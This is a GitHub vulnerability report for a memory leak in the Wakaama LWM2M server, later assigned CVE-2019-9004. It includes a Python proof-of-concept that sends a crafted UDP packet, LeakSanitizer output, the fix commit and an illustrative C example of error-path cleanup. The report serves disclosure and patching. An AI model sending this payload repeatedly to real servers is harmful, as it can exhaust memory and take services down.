Memory leak while processing crafted packet #425

Closed
cve-reporting opened this issue Feb 18, 2019 · 1 comment

@cve-reporting
commented Feb 18, 2019

The Wakaama LWM2M server incorrectly handles incoming packets, leading to a memory leak.
Processing a single crafted packet leaks (wastes) 24 bytes of memory.
This can lead to the LWM2M server stopping after exhausting all available memory.
Depending on server configuration and isolation of services, this can also stop other processes on the same server.

Proposed CVSS 3.0 Score:

On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Reproduction:

  1. Wakaama must be compiled with Leak Sanitizer (or another similar tool) by setting the compilation flag:
    C_FLAGS = -fsanitize=address

  2. Run the Wakaama server as:
    lwm2mserver -4 -l 55555

  3. Run the following Python2 script (running it multiple times will show a larger leak):


    import sys
    import socket

    WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
    out_data = WAKAAMA_PAYLOAD.decode('hex')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
    s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))


    Execution of the script:

    python2 wakaama_test.py dst_ip dst_port
    (where: dst_ip and dst_port are IP and port of tested Wakaama server)
    e.g.:
    sudo python wakaama_test.py 192.168.0.101 55555

  4. Close the lwm2mserver to get the report from Leak Sanitizer:

    12 bytes received from [....]:....
    44 02 E6 E2 E2 E6 81 67 B2 72 64 11 D......g.rd.
    ^C
    =================================================================
    ==19153==ERROR: LeakSanitizer: detected memory leaks

    Direct leak of 24 byte(s) in 1 object(s) allocated from:
    #0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
    #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
    #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
    #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
    #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
    #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

sbertin-telular added a commit to sbertin-telular/wakaama that referenced this issue Feb 18, 2019

Fix memory leak with bad options.
Option processing can allocate memory. Encountering a bad option was
returning an error without freeing that memory. This adds the necessary
calls to free the memory to fix eclipse#425.

Signed-off-by: Scott Bertin <sbertin@telular.com>
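
The error-path cleanup that the commit message describes, shown on a simplified option parser as an added example. It is not Wakaama's code or the patch from #426; `seg_t`, `parse_options`, `free_segs`, `live_allocs` and the sample bytes are hypothetical and constructed for illustration.

```c
/* Added illustration: simplified CoAP option parser, not Wakaama source.
 * All names are hypothetical; only short (non-extended) options are modelled. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef struct seg { struct seg *next; const uint8_t *data; uint8_t len; } seg_t;
static int live_allocs; /* outstanding nodes; stands in for LeakSanitizer */

static void free_segs(seg_t *s) {
    while (s) { seg_t *next = s->next; free(s); live_allocs--; s = next; }
}

/* Walks the options of one message. Repeatable options (Uri-Path 11,
 * Uri-Query 15) get one heap node each, appended to *out. Returns -1 on a
 * truncated option or an unrecognised critical (odd-numbered) option.
 * free_on_error = 0 models the pre-fix error path, 1 the fixed one. */
static int parse_options(const uint8_t *p, size_t n, seg_t **out, int free_on_error) {
    unsigned opt = 0;
    seg_t **tail = out;
    *out = NULL;
    for (size_t i = 0; i < n && p[i] != 0xFF; ) {
        unsigned delta = p[i] >> 4, len = p[i] & 0x0F;
        i++;
        if (delta > 12 || len > 12 || len > n - i) goto bad;
        opt += delta;
        if (opt == 11 || opt == 15) {
            seg_t *s = malloc(sizeof *s);
            if (!s) goto bad;
            live_allocs++;
            s->next = NULL; s->data = p + i; s->len = (uint8_t)len;
            *tail = s; tail = &s->next;
        } else if (opt & 1) goto bad;
        i += len;
    }
    return 0;
bad: /* the fix: release what this message already allocated before failing */
    if (free_on_error) { free_segs(*out); *out = NULL; }
    return -1;
}

int main(void) {
    static const uint8_t msg[] = {0xB1, 'a', 0x21, 'x'}; /* constructed sample */
    seg_t *list;
    for (int fixed = 0; fixed <= 1; fixed++) {
        int rc = parse_options(msg, sizeof msg, &list, fixed);
        printf("fixed=%d rc=%d outstanding=%d\n", fixed, rc, live_allocs);
        free_segs(list); /* demo cleanup so the counter starts at 0 again */
    }
    return 0;
}
```

With `free_on_error = 0`, a caller that drops the message on `-1` loses the only reference to the list, which is the pattern a leak detector reports as a direct leak.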

dnav closed this in #426 Feb 19, 2019

@cve-reporting

commented Feb 25, 2019

For this vulnerability the following ID was assigned: CVE-2019-9004
